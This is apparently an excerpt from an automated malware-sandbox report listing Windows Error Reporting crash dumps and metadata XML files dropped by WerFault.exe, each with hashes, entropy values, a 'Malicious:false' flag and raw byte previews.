                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7085.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:29:13 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):137344
                                                                                                                                  Entropy (8bit):1.9924630013899194
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:G+1PSgEWSJP8jH83bNJX7GS08mK5eLrz4/V:Gyta0jH8X7GS08mKgv4
                                                                                                                                  MD5:DA41B40A09DF1DED99B969F7BE5D0306
                                                                                                                                  SHA1:ECCC60A6808AB7DB47227D97287F7D5153B5B4EE
                                                                                                                                  SHA-256:8837AEAD8018BC2178EBB9C657A65A133C108D751CF4B4FA52BE8AE9E328BF6C
                                                                                                                                  SHA-512:EB39B7839E946814F552BCB987857A19B0F7025784003AC89A3601113744C722D766B315BD3BACD54E1C1EACC2AB95A5B169718AEAFB923BB94D2507CC1DDBB9
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......I..g.........................................N..........T.......8...........T............Z...............#...........%..............................................................................eJ......8&......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7151.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8412
                                                                                                                                  Entropy (8bit):3.6974627536518097
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1b6eu6YVF6pGgmfLYspBp89bA6sfS2Am:R6lXJZ6f6Yn6YgmfLwAZfP
                                                                                                                                  MD5:15B330452B42F9951498A987C4C6C6D5
                                                                                                                                  SHA1:388223CDE5392AF58184C9AD6C6D4FF7A5FF6E4E
                                                                                                                                  SHA-256:8FE7710F9A4ADFCF2FD5DF1F49090E346C6E1290A2723E618219B1F5A853EC14
                                                                                                                                  SHA-512:CBB0BD6861C0956FBFB9F989DB302D02F54AF35E0FB7AD01E3DB831F161FA959F1B19BF66DC459899FD87F128C8702BEA345E37DFB3B0BE1583E6D1C42245AC4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7171.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.468305098751015
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYlYm8M4JqsHFIMGo+q8vzsU1KNfNwd:uIjffI7hd7VlJgXoKxKNfNwd
                                                                                                                                  MD5:D7E410BEABF87F1B4B999F75FD7EF472
                                                                                                                                  SHA1:45148AFEA98179A331ABA4A5BF975D9A9EDD856B
                                                                                                                                  SHA-256:7567CB6177275006CC3589D2E047085C6BC25F99B07C8299B4DE4F9831FD22BC
                                                                                                                                  SHA-512:21D7977644DB99D9AAA31CD8F061938D17730FE19C7B85430A9105528E545687733D54E5F6650BB673E0ED98626BE1F28F854A377CBD48F6EA05DC9C306063ED
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7577.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:29:14 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):136510
                                                                                                                                  Entropy (8bit):1.9972036654374057
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:PHbRgEnkiNy13bNJX7UO7HRP9bQ4/2Gfhc:PtNy1X7UOFP9bQ4/2ee
                                                                                                                                  MD5:661F07F48EAC14C1DDEA5F692C996DE0
                                                                                                                                  SHA1:2C255DDA364575583DD37372AF6FCB1064ACC33A
                                                                                                                                  SHA-256:F4C9750879C78A0DA22E40B756253F8CF1DEF7C0F56927B04FF794B5C60AB8ED
                                                                                                                                  SHA-512:8616FAE6B1D266A7953B1000D477612D700F2E6178887570C3166229C7B617ACC5B37C4D319A0C049FA99E8F37C5271592C62B7289F9F637D8327D62ACDF0995
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......J..g........................p...........D....P..........T.......8...........T...........x[..............$..........x&..............................................................................eJ.......'......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7614.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8412
                                                                                                                                  Entropy (8bit):3.6995286243236243
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1F6a6x6YVX6pGgmf5Kseu8spB089bW6sfFym:R6lXJn6B6Y16Ygmf53eubWZfB
                                                                                                                                  MD5:AE8FE288807DA21F880BCE54B867E5DB
                                                                                                                                  SHA1:F43521F8A0F5B778384FD6287459A1A5C2C6B3FC
                                                                                                                                  SHA-256:C49DC7D49533454046BA1E5CEA0600C85B2421E2CC6ED65267DCBBBBDAD9AD06
                                                                                                                                  SHA-512:1ED9689CA5CF1094D28C2706A1E9183FF709C91FFE6CDF283B856F914ACC3AB8AEDF062125623B5E1F2D357817FF16E64F996578B9F969D20F86233E1F913C3C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7673.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.460081583515981
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYxYm8M4JqsH3F1a+q8vzsHk1KNfNwd:uIjffI7hd7VlJx+KygKNfNwd
                                                                                                                                  MD5:78E11673582495702E2F2B8FEE337F4E
                                                                                                                                  SHA1:300325E7DEC42496A9E6CD5576077CCE5E82EAEF
                                                                                                                                  SHA-256:5E71FD984A87E73002162964B8ACBADD4ABC343CA8552F6ECA64920BCC260591
                                                                                                                                  SHA-512:2E60DF4F7DF2EAC2B2FDB8D779FD60FCCCE56CF81F071623DDA8A12AFF6F7A44246917146301D2558EE012B403B633A59A6FCC3A247BBD549D8D32EF41F55439
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D95.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:29:17 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):138222
                                                                                                                                  Entropy (8bit):2.0018470679548277
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:FHbQMgE5u8jY0yjHWrw3bNJX73zNECLphQ:FkWjY0yjHWUX73zN9Lp
                                                                                                                                  MD5:A68DD67A078DB6B9D4B11299D495C176
                                                                                                                                  SHA1:691278BA8537950AA3AB93F8F479E8BEDBC74187
                                                                                                                                  SHA-256:A8CFBADD5EC82D148B750071E8CBF10289C1CECE6656D59940ACA060F29E52AC
                                                                                                                                  SHA-512:548F03F31DBA0760A232315A8440F9111456E2B44077EF0A1274D8F781FC943AC9CCED984E942F8425D0ACB40935792EF1138F954AEE17C9DF88E49B5CA0A706
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......M..g........................p................P..........T.......8...........T............[..N............$..........x&..............................................................................eJ.......'......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E32.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8412
                                                                                                                                  Entropy (8bit):3.699938538756411
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1862L6YVG6pGgmfLYspBM89bk6sfgIMm:R6lXJ+666YE6YgmfLvkZfB
                                                                                                                                  MD5:7492DA26EB0DA77D629C19CF8D88214C
                                                                                                                                  SHA1:EEE438DDAFE62BF2504B344F856B40D3193F4150
                                                                                                                                  SHA-256:4306C70471EEE78B1868CB2B84936E564B3695C64A96AA28135E0180234AE1CD
                                                                                                                                  SHA-512:D494D94991D7771A8A373191DA5D3A8BA573DCFBB03BBDA6A7F91228ECC8AA009740199E29A5739E9CD6C74C6E28317954D1829883FA0D31C338CE9B44DF6070
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E91.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.464621305590545
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYtYm8M4JqsHF7R+q8vzsU1KNfNwd:uIjffI7hd7VRJ9KxKNfNwd
                                                                                                                                  MD5:5C69B6F070F7BA2F9E9E26082B06768E
                                                                                                                                  SHA1:F93C73BDA4057750330C7C832168246030433325
                                                                                                                                  SHA-256:27CC1B83C62A3F2403DDBB3D9FFA8894A0C72A56486A6505EC70A0AFA85200BC
                                                                                                                                  SHA-512:A21859282BD7BE192ABC93F10A5C74FC918284B0B397DE8DE2769F65DC0396D9B1B8C519C02A4C83932F551AE1D5698D6915A45ECA2DB410427B2840CBC64E25
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8073.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:29:17 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):149302
                                                                                                                                  Entropy (8bit):2.1085147433639615
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:ZIisXgEkiMGPjO0lGs7HWrw3bNJX7vCtER4gG5Hsw:ZsHMYjO0lGs7HWUX7v/4gG5Hv
                                                                                                                                  MD5:9D5C439116D5FC4359AF97728748D1C8
                                                                                                                                  SHA1:511A4EB06AAFA56E0A1120CEB97FDDC12450C3F1
                                                                                                                                  SHA-256:FE706B3BED83F78799F78151E0BFFCCB713DC686C636B892815D7984C0D8DF97
                                                                                                                                  SHA-512:D1DE22C364E2FE2A11FE7125252F259391CD29A3D3AB3D367C4BD7A5D2B087433BBAAFD4253E31308B270680B90D62DAC7EF0942D5CF2CCA4719C6AA350DFC15
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......M..g............D...............L............S..........T.......8...........T............^..............(%...........'..............................................................................eJ.......'......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER821A.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8412
                                                                                                                                  Entropy (8bit):3.6990936337375317
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1L6Uxd6YV16pGgmfLYspBP89bz6sfRRm:R6lXJJ6Ur6Y36YgmfLmzZf2
                                                                                                                                  MD5:BB73EFD838A8B36FDD65D43C33214E1F
                                                                                                                                  SHA1:CF86BAA3B8FC7529C16533233CAA0E577AED2DD0
                                                                                                                                  SHA-256:10EDA55388A79BDF50A4049FA815BF445DE2799ECB546B2AD60EB20E9B12F4DE
                                                                                                                                  SHA-512:69CD5577EC79F45225AEEF7F7F4D8466075232AAA8413111B16FE597B32A5780AB27A008C45E51A24358BC5B0C807FA53B613D9063368068E8C823CD00917B6A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER823A.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.464141348818175
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYtYm8M4JqsHFjgI+q8vzsU1KNfNwd:uIjffI7hd7VlJsIKxKNfNwd
                                                                                                                                  MD5:1F3CBC0D1BC97F74D80C95B6FE7AF85C
                                                                                                                                  SHA1:F9DAC817940B1203DACCE3CC7F9E08152DBBFE66
                                                                                                                                  SHA-256:F58665EC7E43CD202988D354EFC43B20AC19D71E1E2E066C696AB84D4C6E458A
                                                                                                                                  SHA-512:CE53116B66F0389B1520F2648BCA407BBD939ADBFA05217433E01037C19FD14999790D02C6C832EE41D11694A6F2033A94A163FBD7BEB60A2FA73BDEBCE2F604
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER88A1.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:29:19 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):124336
                                                                                                                                  Entropy (8bit):2.055902334094199
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:IykGm8ceZgEBEFQuwzdecfk60VZPWHJ+y7dRagaOUw2tzBkyMp4RvYOzEcKH:Dm8ceZgEBkeYGk60VZPW/XagKT2OAcM
                                                                                                                                  MD5:AD553439686413EA82F14F3D681C327B
                                                                                                                                  SHA1:F6794CE4C0844DE4CFA5E2568CFB3820A53A314E
                                                                                                                                  SHA-256:AF26328B61FC6CAC7708316A46EA3BB46BA90ED05FA79B447E0AB3AD3259E75C
                                                                                                                                  SHA-512:B7B4AED3BD1A781DF865058F9A420336175C7B63B0BCC95D774968AFE3959613B1C053900BB2DC446146BB482D25661438BA4647BBDC62E93C28A08BEDECBBF1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......O..g............D............ ..L.......t...NZ..........T.......8...........T............b..............8*..........$,..............................................................................eJ.......,......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER89CB.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8412
                                                                                                                                  Entropy (8bit):3.69812318268016
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1s6vq9B7p6YVl6pGgmfcTspBZ89bo6sfzXYm:R6lXJO6ve7p6Yn6YgmfcBoZfzt
                                                                                                                                  MD5:4FF0738A5B4F4436E66D072CFC06BEB6
                                                                                                                                  SHA1:2CCE0AE519C4A85ED5C488D3C339FFB0B8F48E20
                                                                                                                                  SHA-256:5B7F6E1DE309BA1FE0F7E0865113B07F6A263F2F97757A5BE71936C4C18B975F
